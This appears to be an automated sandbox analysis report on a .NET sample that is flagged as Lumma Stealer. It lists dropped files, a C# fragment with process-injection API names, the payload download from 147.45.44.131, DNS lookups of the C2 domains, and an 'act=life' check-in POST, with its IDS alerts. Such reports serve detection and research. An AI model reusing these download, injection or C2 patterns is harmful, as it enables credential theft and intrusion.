                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                      Category:dropped
                                      Size (bytes):206
                                      Entropy (8bit):4.98929983941783
                                      Encrypted:false
                                      SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAIh5QyMKNdH0iQCIFRVRMxTPIUkh4X:pAu+H2L/6K2923fhEHzxszI923fhEC
                                      MD5:41ADF820EA116B0DB84164F65E3C31F9
                                      SHA1:7662FEA49C60EF3A690AE0C0E2B22950E0B31BDC
                                      SHA-256:5348E39A778FD86F61FAF82DB7509C00C95FD6FC5CC8287C33DC1D22EDDBD773
                                      SHA-512:8F28148286B9D5DADB3E2E45F91D72C554B01FA8D2A142FD40AA25E977B0DA1284692513D79F9C6ADF71F88FA87073CE1FD9B62BEB14D1B1EE895DF2DB79F02C
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs"
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):8704
                                      Entropy (8bit):4.6605382207517545
                                      Encrypted:false
                                      SSDEEP:192:QkCaQHf9WDa/u66Rj2ca6Uxd5MqkeNc4:AWDlD95D05MqHy4
                                      MD5:2ACAF59B3936210B2628C468DC76EC72
                                      SHA1:FB610BEE00064B7AE1D5E77A707591AF970AD211
                                      SHA-256:55083D754DB0E0ACD71E32ABA2A7020476A6AB8A174D390A5186141950CDBF5C
                                      SHA-512:53DE04E752F144CA84F7E5E343D6E56184F212825677E8AE1736D5E1502E827F3BD5BC0577CF2472FFD8F77907D7C30269159754901C183275E074BAF9CE2ADA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:b[g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):705
                                      Entropy (8bit):5.23311383030231
                                      Encrypted:false
                                      SSDEEP:12:KMi/qR37L/6KzpEHwpE7KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6KzHeKax5DqBVKVrdFAMBJTH
                                      MD5:9EB6C5E40B2715C7BC2D9025EEFE5E7D
                                      SHA1:4488A1B81B664943CAC9DEEA4E833F751CC1EED4
                                      SHA-256:11A46F049DB323FCE69272001686E4B5B6B5122D32BAE5A0DE77BC05CD4F937F
                                      SHA-512:9181CB8B7455DAF4104C20D33E4AEDF443C28AD8A6296EC9FA14D6DAB63BB445E7451ED512640BD2D93FABE7EAFF9D89CA6FA87A3DE185F34739A9C60357A190
                                      Malicious:false
                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):3.9255822092902686
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:htZgRRla8S.exe
                                      File size:45'568 bytes
                                      MD5:b1becdbff2a34334ae4ff5f387115ec3
                                      SHA1:492305491185a6114ef915ff3b5f705c5facd086
                                      SHA256:c89c8a2ec7d0da083703bd095ba75a8656ae9fd1ffa08b26c8e43d6d04e468c9
                                      SHA512:cef1ace82713bb51aa5c10f47f98aee859dbb363e33a081c60ed6aba43e8ae3d2f09c27d75cc84b242882eb74773083b6cb70160e42b22126757d95cae82a9db
                                      SSDEEP:768:Orn01NSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4fe3Xn:Or01N7aeGEk+11Tu9AnQVLNppvk9RN4e
                                      TLSH:0F23695171FEA029D5B7EBB5BEDDACEDC89E5971182C649700C1928B4B20FE0EA43D34
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5\..........."...0.................. ........@.. ....................... ............`................................
                                      Icon Hash:00928e8e8686b000
                                      Entrypoint:0x40c3ee
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xC45C35F2 [Thu May 24 08:50:58 2074 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Instruction
                                      jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc39c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe000 | 0x818 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xc380 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa3f4 | 0xa400 | c5c3ca1a60a255d8b96c06b1c3f3a5fe | False | 0.24280678353658536 | data | 3.937270708731149 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xe000 | 0x818 | 0xa00 | 44dacd5706e6e7d74f88714de6c5c429 | False | 0.301953125 | data | 3.4692694053567505 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0xc | 0x200 | 3c8ea00c4589b32634d06ca88f94e2b8 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xe090 | 0x588 | data | | | 0.3255649717514124
RT_MANIFEST | 0xe628 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-12T21:32:05.359783+0100 | 2019714 | ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile | 2 | 192.168.2.5 | 49704 | 147.45.44.131 | 80 | TCP
2024-12-12T21:32:05.574589+0100 | 2800029 | ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass | 1 | 147.45.44.131 | 80 | 192.168.2.5 | 49704 | TCP
2024-12-12T21:32:06.957951+0100 | 2057949 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.5 | 56859 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:06.957951+0100 | 2057981 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) | 1 | 192.168.2.5 | 56859 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.176360+0100 | 2057945 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.5 | 59978 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.176360+0100 | 2057983 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) | 1 | 192.168.2.5 | 59978 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.412962+0100 | 2057929 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.5 | 59092 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.412962+0100 | 2057979 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) | 1 | 192.168.2.5 | 59092 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.639261+0100 | 2057931 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.5 | 53406 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.639261+0100 | 2057977 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) | 1 | 192.168.2.5 | 53406 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.871319+0100 | 2057925 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.5 | 59122 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:07.871319+0100 | 2057973 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) | 1 | 192.168.2.5 | 59122 | 1.1.1.1 | 53 | UDP
2024-12-12T21:32:09.569495+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:09.569495+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:09.569495+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:10.590925+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:10.590925+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:10.939727+0100 | 2057926 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.5 | 49706 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:10.939727+0100 | 2057974 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (covery-mover .biz in TLS SNI) | 1 | 192.168.2.5 | 49706 | 172.67.206.64 | 443 | TCP
2024-12-12T21:32:10.939727+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 172.67.206.64 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Dec 12, 2024 21:32:06.182794094 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.182862997 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.184473038 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.184657097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.185012102 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.186350107 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.186517954 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.186608076 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.188286066 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.188406944 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.188502073 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.190164089 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.190268993 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.190321922 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.192126036 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.192219019 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.192348957 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.194082022 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.194175959 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.194232941 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.195827961 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.195945024 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.196000099 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.197854042 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.197968006 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.198044062 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.199702978 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.199815989 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.199870110 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.201688051 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.201806068 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.201915026 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.203623056 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.203749895 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.204524994 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.205570936 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.205770016 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.206043959 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.207828045 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.207900047 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.207947969 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.209738970 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.209799051 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.209924936 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.211396933 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.211554050 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.212951899 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.213344097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.213454008 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.214042902 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.215336084 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.215517998 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.215826035 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.217276096 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.217336893 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.217417002 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.219158888 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.219400883 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.219515085 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.221127033 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.221244097 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.221395969 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.223613024 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.223623991 CET8049704147.45.44.131192.168.2.5
                                      Dec 12, 2024 21:32:06.223695040 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:06.902822971 CET4970480192.168.2.5147.45.44.131
                                      Dec 12, 2024 21:32:08.185652018 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.185688972 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:08.185884953 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.187058926 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:08.187072992 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.569422960 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.569494963 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.573687077 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.573699951 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.574054003 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:09.625638008 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.625663996 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:09.625787973 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.590943098 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.591329098 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.591414928 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592809916 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592832088 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.592844963 CET49705443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.592852116 CET44349705172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.641232014 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641282082 CET44349706172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.641371965 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641768932 CET49706443192.168.2.5172.67.206.64
                                      Dec 12, 2024 21:32:10.641792059 CET44349706172.67.206.64192.168.2.5
                                      Dec 12, 2024 21:32:10.939727068 CET49706443192.168.2.5172.67.206.64
                                      TimestampSource PortDest PortSource IPDest IP
                                      Dec 12, 2024 21:32:06.957951069 CET5685953192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.174612999 CET53568591.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.176359892 CET5997853192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.405689955 CET53599781.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.412961960 CET5909253192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.634768963 CET53590921.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.639261007 CET5340653192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:07.867872000 CET53534061.1.1.1192.168.2.5
                                      Dec 12, 2024 21:32:07.871319056 CET5912253192.168.2.51.1.1.1
                                      Dec 12, 2024 21:32:08.179858923 CET53591221.1.1.1192.168.2.5
                                       DNS queries
                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                       Dec 12, 2024 21:32:06.957951069 CET | 192.168.2.5 | 1.1.1.1 | 0xe8e4 | Standard query (0) | zinc-sneark.biz | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.176359892 CET | 192.168.2.5 | 1.1.1.1 | 0x81c7 | Standard query (0) | se-blurry.biz | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.412961960 CET | 192.168.2.5 | 1.1.1.1 | 0x17a2 | Standard query (0) | dwell-exclaim.biz | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.639261007 CET | 192.168.2.5 | 1.1.1.1 | 0x481d | Standard query (0) | formy-spill.biz | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.871319056 CET | 192.168.2.5 | 1.1.1.1 | 0xb247 | Standard query (0) | covery-mover.biz | A (IP address) | IN (0x0001) | false
                                       DNS answers
                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                       Dec 12, 2024 21:32:07.174612999 CET | 1.1.1.1 | 192.168.2.5 | 0xe8e4 | Name error (3) | zinc-sneark.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.405689955 CET | 1.1.1.1 | 192.168.2.5 | 0x81c7 | Name error (3) | se-blurry.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.634768963 CET | 1.1.1.1 | 192.168.2.5 | 0x17a2 | Name error (3) | dwell-exclaim.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:07.867872000 CET | 1.1.1.1 | 192.168.2.5 | 0x481d | Name error (3) | formy-spill.biz | none | none | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:08.179858923 CET | 1.1.1.1 | 192.168.2.5 | 0xb247 | No error (0) | covery-mover.biz | | 172.67.206.64 | A (IP address) | IN (0x0001) | false
                                       Dec 12, 2024 21:32:08.179858923 CET | 1.1.1.1 | 192.168.2.5 | 0xb247 | No error (0) | covery-mover.biz | | 104.21.58.186 | A (IP address) | IN (0x0001) | false
                                      • covery-mover.biz
                                      • 147.45.44.131
                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       0 | 192.168.2.5 | 49704 | 147.45.44.131 | 80 | 4144 | C:\Users\user\Desktop\htZgRRla8S.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       Dec 12, 2024 21:32:04.093641043 CET | 180 | OUT | GET /infopage/ung0.exe HTTP/1.1
                                       X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                       Host: 147.45.44.131
                                       Connection: Keep-Alive
                                       Dec 12, 2024 21:32:05.359586954 CET | 1236 | IN | HTTP/1.1 200 OK
                                       Date: Thu, 12 Dec 2024 20:32:05 GMT
                                       Server: Apache/2.4.52 (Ubuntu)
                                       Last-Modified: Tue, 10 Dec 2024 18:22:16 GMT
                                       ETag: "48e00-628ee8f9c1375"
                                       Accept-Ranges: bytes
                                       Content-Length: 298496
                                       Keep-Alive: timeout=5, max=100
                                       Connection: Keep-Alive
                                       Content-Type: application/x-msdos-program
                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELUg@p@0x9,.text `.rdata "@@.data P@.CRT R@@.relocx90:T@B


                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       0 | 192.168.2.5 | 49705 | 172.67.206.64 | 443 | 5596 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-12-12 20:32:09 UTC | 263 | OUT | POST /api HTTP/1.1
                                       Connection: Keep-Alive
                                       Content-Type: application/x-www-form-urlencoded
                                       User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                       Content-Length: 8
                                       Host: covery-mover.biz
                                       2024-12-12 20:32:09 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                       Data Ascii: act=life
                                       2024-12-12 20:32:10 UTC | 1008 | IN | HTTP/1.1 200 OK
                                       Date: Thu, 12 Dec 2024 20:32:10 GMT
                                       Content-Type: text/html; charset=UTF-8
                                       Transfer-Encoding: chunked
                                       Connection: close
                                       Set-Cookie: PHPSESSID=ssdfi33vdg4rogpdk88i292lk7; expires=Mon, 07-Apr-2025 14:18:49 GMT; Max-Age=9999999; path=/
                                       Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                       Cache-Control: no-store, no-cache, must-revalidate
                                       Pragma: no-cache
                                       CF-Cache-Status: DYNAMIC
                                       Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vzcFCnDato8NNHzxvvWrsAceHp4ikss3CO53FznUfeiUIgnkwcIn1DX4hPcWiJd%2F0lz3j8m4RCqRiPJMqMOa217WSjiXJZhEhL9Zo%2FY2s%2Fw7N9vMsQaaVUrsGCD9HLG9Z2pR"}],"group":"cf-nel","max_age":604800}
                                       NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                       Server: cloudflare
                                       CF-RAY: 8f107b6d8c0318f2-EWR
                                       alt-svc: h3=":443"; ma=86400
                                       server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1530&rtt_var=765&sent=8&recv=9&lost=0&retrans=1&sent_bytes=4224&recv_bytes=907&delivery_rate=28678&cwnd=232&unsent_bytes=0&cid=13260a738a397a10&ts=1143&x=0"
                                       2024-12-12 20:32:10 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
                                       Data Ascii: 2ok
                                       2024-12-12 20:32:10 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                       Data Ascii: 0


                                      Target ID:0
                                      Start time:15:32:02
                                      Start date:12/12/2024
                                      Path:C:\Users\user\Desktop\htZgRRla8S.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\htZgRRla8S.exe"
                                      Imagebase:0xcf0000
                                      File size:45'568 bytes
                                      MD5 hash:B1BECDBFF2A34334AE4FF5F387115EC3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:15:32:05
                                      Start date:12/12/2024
                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline"
                                      Imagebase:0xd10000
